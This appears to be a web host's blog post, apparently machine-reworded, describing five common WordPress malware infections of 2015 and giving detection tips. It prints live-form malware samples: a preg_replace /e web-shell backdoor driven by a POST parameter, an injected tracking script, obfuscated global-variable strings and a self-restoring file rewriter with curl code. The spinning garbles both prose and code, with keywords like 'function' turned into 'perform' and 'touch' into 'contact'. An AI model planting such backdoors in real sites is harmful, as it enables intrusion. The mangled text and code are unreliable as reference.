blog posts

hosting image

The most common wordpress compromises of 2015

< All Topics
You are here:

2015 is coming to an in depth, and WebHostingPeople’s Managed WordPress Internet hosting has been defending wordpress websites from all types of malware. WordPress acquired hacked? WebHostingPeople may also clear your web site throughout a migration throughout a web site switch.

The most typical 5 have been:

1) JSQuery Malware

Mostly added into the header.php file. That is hidden malware added to code underneath the header line normally. Get this and also you’ll doubtless see a malware warning web page in your browser. Widespread code blocks appear to be

<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(doc.title); var se_referrer = encodeURIComponent(doc.referrer); var host = encodeURIComponent(; var base =


Suggestions: Use clamav to scan your wordpress set up, and monitor file modifications of themes like header.php.

2. Preg Exchange malware

Malware code inserted into legitimate scripts usually is used to run shell instructions, whereas leaving the script showing to work usually. Widespread ones appear to be

<?php @preg_replace(‘/(.*)/e’, @$_POST[‘hsrgazelvldxwu’], ”);


It’s common to have the code within the first line, however this malware may doubtlessly be positioned in any the place within the code.

  • Suggestions: grep for @preg_replace(‘/(.*)/e to seek out this malware.

3) Fundamental PHP Shell

The Fundamental PHP Shell is a brand new file created. It’s not a part of of a wordpress set up and doesn’t exchange or edit legitimate wordpress code.


  • Suggestions: Use clamav virus scanner and search for information that aren’t a part of the wordpress set up.

4) Hidden malware inserted into information:

This malware tries to cover within the file, so in your regular textual content editor you might miss it. Widespread strains are “$GLOBALS[‘q4a3496’];international$q4a3496;”


Suggestions: Use clamav or seek for “]]);}exit();} ?><?php” “‘ ]); }?> <?php” or “‘ ]) ); } ?>”

5) Legitimate file changed, equivalent to nav-menu.php

One of these malware can exchange information, equivalent to .htaccess every time the web page is loaded. Code could appear to be

perform my_correct($dir)
$time = 0;
$path = $dir . ‘/index.php’;
$content material = base64_decode(‘PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZS$
if (file_get_contents($path) != $content material)
chmod($path, 0644);
file_put_contents($path, $content material);
chmod($path, 0444);
$time = my_time($dir);
contact($path, $time);

$path = $dir . ‘/.htaccess’;
$content material = base64_decode(‘IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJX$
if (file_exists($path) AND file_get_contents($path) != $content material)
chmod($path, 0644);
file_put_contents($path, $content material);
chmod($path, 0444);
if (!$time)
$time = my_time($dir);

contact($path, $time);

my_correct(dirname(__FILE__) . ‘/..’);

perform request_url_data($url) {
$site_url = (preg_match(‘/^https?:///i’, $_SERVER[‘REQUEST_URI’]) ? $_SERVER[‘REQUEST_URI’] : ‘http://’ . $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’]);
if (function_exists(‘curl_init’)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
‘X-Forwarded-For: ‘ . $_SERVER[“REMOTE_ADDR”],
‘Person-Agent: ‘ . $_SERVER[“HTTP_USER_AGENT”],
‘Referer: ‘ . $site_url,
$response = trim(curl_exec($ch));


Suggestions: Confirm the checksum of legitimate wordpress information with the unique wordpress set up

The fact with wordpress, or any third get together php script, every little thing must be stored updated. WordPress core usually auto updates by default – however the core is only one/Three of what must be up to date. Plugins can have safety points as nicely – so plugins have to be up to date and are manually executed. Take away any un-used plugins. The final step is any theme have to be up to date. There are occasions when a theme has exploit in it. Two that come to thoughts in themes are timthumb and revslider the place older variations have had safety points.

WebHostingPeople managed wordpress internet hosting affords an online firewall to dam many frequent assaults in addition to a number of backups and revisions. Our techs are specialists at maintaining wordpress websites safe, and might even clear up hacked wordpress websites as they transfer onto the managed wordpress platform.